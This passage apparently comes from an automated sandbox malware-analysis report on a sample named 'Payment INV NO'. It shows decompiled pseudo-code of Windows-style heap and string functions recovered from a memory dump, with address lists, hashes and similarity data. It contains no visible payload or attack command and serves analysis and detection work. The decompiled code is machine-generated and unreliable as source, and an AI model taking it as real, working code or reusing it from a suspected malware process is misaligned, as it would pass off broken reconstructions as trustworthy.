								_t84 = 0x5c;
								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
										_push(_v60);
										E017D95D0();
										E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
										_t51 = 0xc0000106;
									} else {
										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
										goto L5;
									}
								} else {
									L5:
									 *_a4 = _t109;
									_t51 = 0;
								}
							}
						}
					}
				}
				return _t51;
			}

























                                                          0x017cf0d3
                                                          0x017cf0d9
                                                          0x017cf0e0
                                                          0x017cf0e7
                                                          0x017cf0f2
                                                          0x017cf0f4
                                                          0x017cf0f8
                                                          0x017cf100
                                                          0x017cf108
                                                          0x017cf10d
                                                          0x017cf115
                                                          0x017cf116
                                                          0x017cf11f
                                                          0x017cf123
                                                          0x017cf124
                                                          0x017cf12c
                                                          0x017cf130
                                                          0x017cf134
                                                          0x017cf13d
                                                          0x017cf144
                                                          0x017cf14b
                                                          0x017cf152
                                                          0x0180bab0
                                                          0x0180bab0
                                                          0x017cf158
                                                          0x017cf158
                                                          0x017cf15a
                                                          0x017cf160
                                                          0x017cf165
                                                          0x017cf166
                                                          0x017cf16f
                                                          0x017cf173
                                                          0x0180baa7
                                                          0x0180baa7
                                                          0x0180baab
                                                          0x00000000
                                                          0x017cf179
                                                          0x017cf18d
                                                          0x017cf191
                                                          0x0180baa2
                                                          0x00000000
                                                          0x017cf197
                                                          0x017cf19b
                                                          0x017cf1a2
                                                          0x017cf1a9
                                                          0x017cf1af
                                                          0x017cf1b2
                                                          0x017cf1b6
                                                          0x017cf1b9
                                                          0x017cf1c4
                                                          0x017cf1d8
                                                          0x017cf1df
                                                          0x017cf1e3
                                                          0x017cf1eb
                                                          0x017cf1ee
                                                          0x017cf1f4
                                                          0x017cf20f
                                                          0x0180bab7
                                                          0x0180babb
                                                          0x0180bacc
                                                          0x0180bad1
                                                          0x017cf215
                                                          0x017cf218
                                                          0x017cf226
                                                          0x017cf22b
                                                          0x00000000
                                                          0x017cf22b
                                                          0x017cf1f6
                                                          0x017cf1f6
                                                          0x017cf1f9
                                                          0x017cf1fb
                                                          0x017cf1fb
                                                          0x017cf1f4
                                                          0x017cf191
                                                          0x017cf173
                                                          0x017cf152
                                                          0x017cf203

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: @
                                                          • API String ID: 0-2766056989
                                                          • Opcode ID: 91a6efc01a06d45a66937a12d5f600b4f02da95f32a0577738310177da802e49
                                                          • Instruction ID: 476ddf5e0a6f8d7af542179a2e09fcf67440d606463c80ed56593427f636f574
                                                          • Opcode Fuzzy Hash: 91a6efc01a06d45a66937a12d5f600b4f02da95f32a0577738310177da802e49
                                                          • Instruction Fuzzy Hash: 8A415875501715ABC321CF19C841A6BFBF8FF88B10F008A2EFA9687690E774E944CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A14A9 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017A14A9(void* __ecx, void* __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				signed int _t72;
				void* _t75;
				intOrPtr _t76;
				void* _t77;
				signed int _t79;

				_v12 = _v12 & 0x00000000;
				_t77 = __edx;
				_t75 = __ecx;
				if(__edx == 0 || __ecx == 0) {
					L24:
					return 0xc000000d;
				} else {
					_t62 = _a4;
					if(_t62 == 0) {
						goto L24;
					}
					_v16 =  *_t62;
					_t64 = E017B4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0xaa);
					_v20 = _t64;
					if(_t64 == 0) {
						return 0xc0000017;
					}
					_t45 =  *(_t77 + 6) & 0x0000ffff;
					if(( *(_t77 + 6) & 0x0000ffff) <= 0) {
						_v24 = _t64;
						_v28 = 0xaa0000;
						if(E017A3B30( *(_t77 + 4) & 0x0000ffff,  &_v28) != 0) {
							L6:
							_t76 = _a8;
							_t66 = _a12;
							if( *_t62 <= 0 ||  *_t62 > _t66) {
								L8:
								_t72 = _v16;
								_t20 = _t72 + 1; // 0x1
								_t79 = _t20 + ((_v28 & 0x0000ffff) >> 1);
								if(_t76 != 0) {
									if(_t72 >= _t79) {
										goto L9;
									}
									if(_t79 >= _t66) {
										L10:
										if(_t76 != 0) {
											_v12 = 0xc0000023;
										}
										L11:
										 *_t62 = _t79;
										goto L12;
									}
									E017DF3E0(_t76 + _t72 * 2, _v24, _v28 & 0x0000ffff);
									 *((short*)(_t76 + _t79 * 2 - 2)) = 0;
									goto L11;
								}
								L9:
								if(_t79 < _t66) {
									goto L11;
								}
								goto L10;
							} else {
								if(E017A2E22(_v24,  *_t62) != 0) {
									L12:
									E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v20);
									return _v12;
								}
								_t66 = _a12;
								goto L8;
							}
						}
						_v12 = 0xc00000e5;
						goto L12;
					}
					E017DBB40( *( *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0xc)) + _t45 * 2),  &_v28,  *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0x10)) +  *( *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x18)) + 0xc)) + _t45 * 2) * 2);
					goto L6;
				}
			}
















                                                          0x017a14b1
                                                          0x017a14b7
                                                          0x017a14ba
                                                          0x017a14be
                                                          0x017f6968
                                                          0x00000000
                                                          0x017a14cc
                                                          0x017a14cc
                                                          0x017a14d1
                                                          0x00000000
                                                          0x00000000
                                                          0x017a14d9
                                                          0x017a14f2
                                                          0x017a14f4
                                                          0x017a14f9
                                                          0x00000000
                                                          0x017f6946
                                                          0x017a14ff
                                                          0x017a1506
                                                          0x017a157c
                                                          0x017a1584
                                                          0x017a1592
                                                          0x017a1525
                                                          0x017a1528
                                                          0x017a152b
                                                          0x017a152e
                                                          0x017a1538
                                                          0x017a1538
                                                          0x017a1541
                                                          0x017a1544
                                                          0x017a1548
                                                          0x017a159b
                                                          0x00000000
                                                          0x00000000
                                                          0x017a159f
                                                          0x017a154e
                                                          0x017a1550
                                                          0x017f695c
                                                          0x017f695c
                                                          0x017a1556
                                                          0x017a1556
                                                          0x00000000
                                                          0x017a1556
                                                          0x017a15ad
                                                          0x017a15b7
                                                          0x00000000
                                                          0x017a15b7
                                                          0x017a154a
                                                          0x017a154c
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x017a15be
                                                          0x017a15cc
                                                          0x017a1558
                                                          0x017a1567
                                                          0x00000000
                                                          0x017a156c
                                                          0x017a15ce
                                                          0x00000000
                                                          0x017a15ce
                                                          0x017a152e
                                                          0x017f6950
                                                          0x00000000
                                                          0x017f6950
                                                          0x017a1520
                                                          0x00000000
                                                          0x017a1520

                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: #
                                                          • API String ID: 0-1885708031
                                                          • Opcode ID: ec71f8e5d1fc4536558cbe466cee290427c2a30209971c13bcc2ecff8395895a
                                                          • Instruction ID: cff9ead3a7bd17332ae2fcfc2b70d1821839991f6dc09fd9d96b1841380e873a
                                                          • Opcode Fuzzy Hash: ec71f8e5d1fc4536558cbe466cee290427c2a30209971c13bcc2ecff8395895a
                                                          • Instruction Fuzzy Hash: 9B41DE75A0021ADBDF25CF48C490BBEF7B5EF84311FA8025EEA96A7204DB30D941C791
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017B77F0 Relevance: .7, Instructions: 656COMMONCrypto
                                                          Download Yara Rule
                                                          C-Code - Quality: 82%
                                                          			E017B77F0(signed int _a4, signed int _a8, signed char _a12) {
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed char _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				void* _v56;
				void* _v60;
				void* _v64;
				void* _v65;
				void* _v81;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t224;
				signed char _t225;
				signed short _t231;
				signed short _t247;
				char* _t255;
				intOrPtr _t256;
				signed int _t260;
				signed int _t267;
				signed int* _t268;
				signed int* _t269;
				signed short _t275;
				void* _t278;
				signed int _t284;
				signed int _t285;
				signed int _t288;
				signed int _t291;
				signed int _t294;
				signed char _t297;
				signed int* _t298;
				signed int _t302;
				signed int _t305;
				signed char _t308;
				signed int _t314;
				signed int _t321;
				signed short _t325;
				signed short _t327;
				signed short _t328;
				signed int _t330;
				void* _t331;
				signed int _t335;
				signed char _t340;
				signed int _t343;
				signed int* _t345;
				signed int _t360;
				void* _t361;
				unsigned int _t366;
				void* _t373;
				signed int _t375;
				signed int _t391;
				signed int _t400;
				signed int _t409;
				unsigned int _t418;
				void* _t422;
				unsigned int _t432;
				signed int _t446;
				signed int _t448;
				signed int* _t451;
				signed int _t453;
				signed int _t456;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				signed char _t467;
				signed int _t468;
				signed int _t469;
				unsigned int _t477;
				signed int _t483;
				signed int** _t486;
				signed int _t490;
				void* _t492;
				signed int _t495;
				signed int _t498;
				signed int* _t501;
				signed int _t503;
				signed int* _t504;
				void* _t505;
				signed char* _t509;
				signed int _t516;
				signed int _t517;
				void* _t519;
				void* _t520;

				_t519 = (_t517 & 0xfffffff8) - 0x34;
				_t340 = _a12;
				_v32 = _t340;
				if(_t340 == 0) {
					return 1;
				} else {
					_t495 = _a4;
					if(_t495 == 0) {
						_push(0x13);
						L0185A80D(0, _t340, 0, 0);
					}
					if( *((intOrPtr*)(_t495 + 8)) == 0xddeeddee) {
						_push(_a8);
						_t483 = L0183282E(__eflags);
					} else {
						if(( *0x1888724 & 0x00000002) != 0) {
							_t483 = L018527B1(_t495, _t340, _a8);
						} else {
							_t485 = 0;
							if(( *(_t495 + 0x44) & 0x01000000) != 0) {
								_t224 = _a8;
								goto L31;
							} else {
								if(( *(_t495 + 0x48) & 0x00000001) != 0) {
									_t485 = E01791E04(_t495, _t340, 0, _t495, __eflags);
								} else {
									if((_t340 & 0x00000007) != 0) {
										_push(0x13);
										_push(0);
										_push(0);
										_push(_t340);
										goto L93;
									} else {
										_t16 = _t340 - 8; // 0x1792e8a
										_t492 = _t16;
										if( *((char*)(_t340 - 1)) == 5) {
											_t149 = _t492 + 6; // 0x68b0002
											_t485 = _t492 - (( *_t149 & 0x000000ff) << 3);
										}
										if(( *(_t485 + 7) & 0x0000003f) == 0) {
											_push(0x13);
											_push(0);
											_push(0);
											_push(_t485);
											L93:
											L0185A80D(_t495);
											_t485 = 0;
										}
									}
								}
								if(_t485 == 0) {
									L94:
									 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc000000d;
									 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E0179CCC0(0xc000000d);
									_t483 = 0;
								} else {
									_t224 = _a8;
									if( *((char*)(_t340 - 1)) == 5) {
										__eflags =  *(_t485 + 7);
										if(__eflags >= 0) {
											__eflags =  *(_t495 + 0x4c);
											if( *(_t495 + 0x4c) == 0) {
												goto L100;
											} else {
												_t477 =  *(_t495 + 0x50) ^  *_t485;
												_t360 = _t477 >> 0x00000010 ^ _t477 >> 0x00000008 ^ _t477;
												__eflags = _t477 >> 0x18 - _t360;
												if(_t477 >> 0x18 != _t360) {
													goto L119;
												} else {
													goto L100;
												}
											}
										} else {
											_t360 = _t495;
											_t335 = L0185677F(_t340, _t360, _t485, _t495, __eflags);
											 *((char*)(_t519 + 0x13)) = _t335;
											__eflags = _t335;
											if(_t335 != 0) {
												L100:
												__eflags =  *(_t485 + 7);
												if( *(_t485 + 7) >= 0) {
													__eflags =  *(_t495 + 0x4c);
													if( *(_t495 + 0x4c) == 0) {
														_t231 =  *_t485 & 0x0000ffff;
													} else {
														_t328 =  *_t485;
														__eflags =  *(_t495 + 0x4c) & _t328;
														if(( *(_t495 + 0x4c) & _t328) != 0) {
															_t328 = _t328 ^  *(_t495 + 0x50);
															__eflags = _t328;
														}
														_t231 = _t328 & 0x0000ffff;
													}
												} else {
													_t432 = _t485 >> 0x00000003 ^  *_t485 ^  *0x188874c ^ _t495;
													__eflags = _t432;
													if(_t432 == 0) {
														_t330 = _t485 - (_t432 >> 0xd);
														__eflags = _t330;
														_t331 =  *_t330;
													} else {
														_t331 = 0;
													}
													_t231 =  *((intOrPtr*)(_t331 + 0x14));
												}
												__eflags =  *(_t485 + 7) - 4;
												_t446 = _t231 & 0xffff;
												if( *(_t485 + 7) != 4) {
													_t360 = _t446 * 8;
												} else {
													__eflags =  *(_t495 + 0x4c);
													if( *(_t495 + 0x4c) == 0) {
														_t325 =  *_t485 & 0x0000ffff;
													} else {
														_t327 =  *_t485;
														__eflags =  *(_t495 + 0x4c) & _t327;
														if(( *(_t495 + 0x4c) & _t327) != 0) {
															_t327 = _t327 ^  *(_t495 + 0x50);
															__eflags = _t327;
														}
														_t325 = _t327 & 0x0000ffff;
													}
													_t169 = _t485 - 8; // 0xfc78b01
													_t360 =  *_t169 - (_t325 & 0x0000ffff) + _t446;
												}
												__eflags = _t360 + _t485 - _t340;
												if(_t360 + _t485 >= _t340) {
													goto L121;
												} else {
													L119:
													 *((char*)(_t519 + 0x13)) = 0;
													goto L120;
												}
											} else {
												L120:
												_push(_t360);
												L0185A80D(_t495, _t485, _t340, 0);
												__eflags =  *((char*)(_t519 + 0x13));
												if( *((char*)(_t519 + 0x13)) == 0) {
													goto L94;
												} else {
													L121:
													_t174 = _t340 - 8; // 0xe8ce8bff
													_t175 = _t340 - 8; // 0x1792e8a
													_t361 = _t175;
													_v24 =  *_t174;
													_t224 = _a8;
													__eflags = _t224 & 0x3c000102;
													if((_t224 & 0x3c000102) != 0) {
														goto L11;
													} else {
														__eflags =  *((char*)(_t361 + 7)) - 5;
														if( *((char*)(_t361 + 7)) != 5) {
															_t422 = 0;
															__eflags = 0;
														} else {
															_t181 = _t361 + 6; // 0x68b0002
															_t422 = _t361 - (( *_t181 & 0x000000ff) << 3) + 8;
														}
														_t321 = L0183CB1E(_v24, _t495, _t340, 3, _t422);
														__eflags = _t321;
														if(_t321 < 0) {
															goto L94;
														} else {
															_t224 = _a8;
															goto L11;
														}
													}
												}
											}
										}
									} else {
										L11:
										if( *(_t485 + 7) >= 0) {
											L31:
											_t225 = E017B7D70(_t495, _t224 | 0x00000002, _t485, _t340);
											_t483 = _t225 & 0x000000ff;
											__eflags = _t225;
											if(_t225 != 0) {
												goto L28;
											} else {
											}
										} else {
											_t366 = _t485 >> 0x00000003 ^  *_t485 ^  *0x188874c ^ _t495;
											if(_t366 != 0) {
												L142:
												_push(_t366);
												L0185A80D(_t495, _t485, 0, 0);
											} else {
												_t366 =  *(_t485 - (_t366 >> 0xd));
												_v48 = _t366;
												if(_t366 == 0) {
													goto L142;
												} else {
													_t24 = _t366 + 4; // 0x2e792
													_v52 =  *_t24;
													_t26 = _t485 + 4; // 0x2e792
													_t448 =  *_t26 >> 0x00000008 & 0x0000ffff;
													_v24 = 0;
													_v40 = _t448;
													_v44 =  *((intOrPtr*)( *((intOrPtr*)( *_t366)) + 0xc));
													_t247 =  *(_v52 + 0x10) ^ _v44 ^ _v52 ^  *0x188874c;
													_t373 = (_t247 >> 0x10) * _t448 + _v52;
													if((_t247 & 0x0000ffff) + _t373 != _t485) {
														_push(_t373);
														L0185A80D( *((intOrPtr*)(_v44 + 0xc)), _t485, 0, 0);
													} else {
														if(E017B7D50() != 0) {
															_t255 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
														} else {
															_t255 = 0x7ffe0380;
														}
														if( *_t255 != 0) {
															_t256 =  *[fs:0x30];
															__eflags =  *(_t256 + 0x240) & 0x00000001;
															if(( *(_t256 + 0x240) & 0x00000001) != 0) {
																_t191 = _t485 + 8; // 0x1792e92
																L01851608( *((intOrPtr*)(_v44 + 0xc)), _t191, 2);
															}
														}
														_t375 = 0x64;
														_v44 = 0x64;
														if( *0x7ffe036a <= 1) {
															_t375 = 0;
															_v44 = 0;
														}
														_v32 = 0;
														_t451 = _v48 + 0x10;
														do {
															_t498 =  *_t451;
															_v28 = _t498;
															if((_t498 >> 0x00000010 & 0x00008000) != 0) {
																goto L84;
															} else {
																asm("lock cmpxchg [edx], ecx");
																if(_t498 != _t498) {
																	_t375 = _v44;
																	goto L84;
																}
															}
															L22:
															 *(_t485 + 7) = 0x80;
															if(_t498 == 0xffffffff) {
																_t196 = _t485 + 8; // 0x1792e92
																E017B0010(_v48 + 8, _t196);
															} else {
																_t486 = _v48;
																asm("btr [eax], ecx");
																if(_t486[3] != 0) {
																	_t453 = L01825208( &(_t486[2]));
																	__eflags = _t453;
																	if(_t453 != 0) {
																		_t516 = 0;
																		__eflags = 0;
																		do {
																			_t418 =  *(_t453 - 4);
																			_t516 = _t516 + 1;
																			_t453 =  *_t453;
																			asm("btr [eax], ecx");
																			_v40 = _t418 >> 0x00000008 & 0x0000ffff;
																			__eflags = _t453;
																		} while (_t453 != 0);
																		_t340 = _v36;
																		_v24 = _t516;
																		_t498 = _v28;
																	}
																	_t451 =  &(_t486[4]);
																}
																_t267 = (_t498 & 0x0000ffff) + _v24 + 0x00000001 | _v40 << 0x00000010;
																_t501 =  *_t486;
																_v28 = _t501;
																if(_t267 == _t486[6]) {
																	_v40 =  *((intOrPtr*)( *_t501 + 0x10));
																	_v24 = _t501[0x16];
																	_t387 = _t501[0x15];
																	__eflags = _t387 - 1;
																	if(_t387 != 1) {
																		L36:
																		_t268 =  *_t486;
																		_v32 = _t268;
																		_t269 =  &(_t268[1]);
																		_t503 =  *_t269;
																		 *_t269 = 0;
																		__eflags = _t503;
																		if(_t503 != 0) {
																			_t68 = _t503 + 0x1c; // 0x1c
																			_t345 = _t68;
																			_t291 =  *_t345;
																			do {
																				__eflags = _t291 & 0xfffffff9;
																				asm("lock cmpxchg [ebx], ecx");
																			} while ((_t291 & 0xfffffff9) != 0);
																			__eflags = _t291 - 6;
																			if(_t291 == 6) {
																				_t387 =  *( *_t503);
																				 *_t503 = 0;
																				goto L75;
																			} else {
																				_t387 = _v32;
																				_t294 = E017B8D76(_v32, _t503);
																				__eflags = _t294;
																				if(_t294 != 0) {
																					while(1) {
																						_t462 =  *_t345;
																						__eflags = _t462;
																						if(_t462 == 0) {
																							goto L54;
																						}
																						__eflags = _t462 & 0x00000002;
																						if((_t462 & 0x00000002) == 0) {
																							_t387 = _t462 | 0x00000002;
																							asm("lock cmpxchg [ebx], ecx");
																							__eflags = _t462 - _t462;
																							if(_t462 != _t462) {
																								continue;
																							} else {
																								_t400 =  *_t503;
																								_t463 = 0;
																								__eflags = 0;
																								_v24 = _t400;
																								_v28 = 0;
																								do {
																									_t464 =  *(_t400 + ((( *(_t400 + 0x5e) & 0x0000ffff) + _t463 & 0x0000000f) + 2) * 4);
																									__eflags = _t464;
																									if(_t464 == 0) {
																										_t387 = _t503;
																										asm("lock cmpxchg [ebx], ecx");
																										__eflags = 0;
																										if(0 == 0) {
																											goto L54;
																										} else {
																											goto L77;
																										}
																										goto L146;
																									} else {
																										_t297 =  *(_t464 + 0x1c);
																										__eflags = _t297 & 0x00000001;
																										if((_t297 & 0x00000001) != 0) {
																											goto L73;
																										} else {
																											asm("lock cmpxchg [ebx], ecx");
																											__eflags = _t464 - _t464;
																											if(_t464 != _t464) {
																												L77:
																												_t400 = _v24;
																												goto L73;
																											} else {
																												_t82 = _t464 + 0x1c; // 0x1c
																												_t302 =  *_t82;
																												do {
																													_t387 = _t302 & 0xfffffffd;
																													__eflags = _t387;
																													asm("lock cmpxchg [esi], ecx");
																												} while (_t387 != 0);
																												__eflags = _t302 - 2;
																												if(_t302 == 2) {
																													_t387 =  *( *_t464);
																													 *_t464 = 0;
																													_t460 = _t464 + 0x20;
																													__eflags = _t464 + 0x20;
																													L53:
																													E017B0010(_t387, _t460);
																												}
																											}
																										}
																									}
																									goto L54;
																									L73:
																									_t463 = _v28 + 1;
																									_v28 = _t463;
																									__eflags = _t463 - 0x10;
																								} while (_t463 < 0x10);
																								_t298 =  *_t503;
																								_t387 =  *((intOrPtr*)( *((intOrPtr*)( *_t298 + 0xc)) + 0x3c0 + (_t298[0x17] & 0x0000ffff) * 4)) + 0x48;
																								__eflags =  *((intOrPtr*)( *((intOrPtr*)( *_t298 + 0xc)) + 0x3c0 + (_t298[0x17] & 0x0000ffff) * 4)) + 0x48;
																								L75:
																								_t140 = _t503 + 0x20; // 0x20
																								_t460 = _t140;
																								goto L53;
																							}
																						}
																						goto L54;
																					}
																				}
																			}
																		}
																		L54:
																		__eflags = _t486[5] & 0x00000003;
																		_t504 =  *_t486;
																		_t343 =  *((intOrPtr*)( *_v32 + 0xc));
																		_v28 = _t343;
																		if((_t486[5] & 0x00000003) != 0) {
																			 *(_t519 + 0x38) =  &(_t486[1][0x407]) & 0xfffff000;
																			_t275 = L01855634(_t486);
																			_push(_t519 + 0x3c);
																			_t391 = (_t486[6] & 0x0000ffff) * (_t275 & 0x0000ffff) << 3;
																			 *(_t519 + 0x38) = _t391;
																			_push(_t391);
																			_t387 =  *(_t343 + 0xc);
																			_t278 = E017C0678( *(_t343 + 0xc), 1);
																			_t520 = _t519 + 4;
																			_push(_t278);
																			_push(_t520 + 0x3c);
																			_push(_t520 + 0x44);
																			_push(0xffffffff);
																			E017D9A00();
																		}
																		_t486[1][3] = 0;
																		E017B97ED(_t343, _t486[1], _t387);
																		_t284 = _t486[6] & 0x0000ffff;
																		_v44 = _t284;
																		_t94 =  &(_t504[0x14]); // 0x6c
																		_t285 = _t94;
																		_v44 =  ~_t284;
																		_v48 = _t285;
																		goto L56;
																		do {
																			do {
																				L56:
																				_t505 =  *_t285;
																				_t456 =  *((intOrPtr*)(_t285 + 4));
																				_v24 = _t456;
																				asm("lock cmpxchg8b [edi]");
																				__eflags = _t505 - _t505;
																				_t285 = _v44;
																			} while (_t505 != _t505);
																			__eflags = _t456 - _v24;
																		} while (_t456 != _v24);
																		_t490 = _v48;
																		 *(_t490 + 4) = 0;
																		asm("lock inc dword [eax+0x20]");
																		 *(_t490 + 0x10) = 0;
																		_t288 =  *(_t490 + 0x1c);
																		do {
																			__eflags = _t288 & 0xfffffffe;
																			asm("lock cmpxchg [edx], ecx");
																		} while ((_t288 & 0xfffffffe) != 0);
																		__eflags = _t288 - 1;
																		if(_t288 == 1) {
																			 *_t490 = 0;
																			E017B0010( *( *_t490), _t490 + 0x20);
																		}
																		_t340 = _v36;
																		goto L26;
																	} else {
																		_t387 = _v40;
